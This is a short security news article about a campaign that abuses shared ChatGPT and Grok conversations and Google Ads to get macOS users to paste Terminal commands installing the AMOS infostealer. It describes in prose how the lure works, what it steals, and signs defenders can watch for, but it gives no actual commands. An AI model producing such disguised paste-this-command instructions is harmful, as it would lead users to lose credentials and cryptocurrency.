Threat Actors Leverage ChatGPT, Grok, and Google Ads to Deploy macOS AMOS Stealer

Home/AI Malware, Application Security, Cybersecurity, Internet Security, MacOS, Malware, Secuirty Update, Security Advisory/Threat Actors Leverage ChatGPT, Grok, and Google Ads to Deploy macOS AMOS Stealer

Threat Actors Leverage ChatGPT, Grok, and Google Ads to Deploy macOS AMOS Stealer

Threat actors are evolving — and they’re doing it on trusted platforms.

A recent campaign shows attackers abusing shareable ChatGPT and Grok conversations, then promoting those links through Google Search ads. The goal? Convince macOS users to run Terminal commands that quietly install the Atomic macOS Stealer (AMOS).

This isn’t traditional malware distribution. It’s credibility-based delivery.

The Shift: Malware Hidden Behind Trust

Instead of hosting malware on suspicious domains, attackers are:

  • Publishing malicious “how-to” conversations on legitimate AI platforms
  • Boosting those pages using Google Ads
  • Framing the instructions as helpful troubleshooting steps

For example, a user searching for something harmless like “clear disk space on macOS” may encounter a sponsored AI chat result. The page looks legitimate. The domain is trusted. The instructions appear technical and helpful.

But the recommended Terminal command downloads and executes malicious code.

No fake installer.
No cracked software.
Just copy, paste, and compromise.

The malicious instructions are hosted on legitimate AI domains via public sharing links. That removes the psychological red flag users often rely on.

Paid ads further amplify visibility, placing these AI-hosted pages at the top of search results — sometimes ahead of legitimate support content.

This is social engineering layered with platform trust.

The Target: Cryptocurrency and Browser Data

macOS infostealers like AMOS are part of a growing underground economy. Their primary targets include:

  • Saved browser credentials
  • Apple Keychain secrets
  • Cryptocurrency wallets and seed phrases
  • Chrome crypto extensions (over 100 reported targets)
  • Wallet-themed phishing tied to brands like Ledger, Trezor, and Exodus

Some operators even advertise affiliate-style revenue sharing for crypto theft, highlighting how organized this ecosystem has become

What defenders should watch for

  • Users copying Terminal commands from web pages
  • Scripts that download and execute immediately
  • Signed apps requesting unexpected permissions
  • Unusual outbound traffic to crypto-related infrastructure

The bigger pattern is clear.

Modern macOS attacks don’t rely on obvious red flags anymore.

They rely on trusted platforms, legitimate domains, paid visibility, and signed applications to remove the moment where a user might hesitate.

That’s the shift defenders need to understand.

Post Views: 36
By | 2026-02-12T16:10:31+05:30 February 12th, 2026|AI Malware, Application Security, Cybersecurity, Internet Security, MacOS, Malware, Secuirty Update, Security Advisory|

About the Author:

FirstHackersNews- Identifies Security

Related Posts

Leave A Comment

Subscribe to our newsletter to receive security tips everday!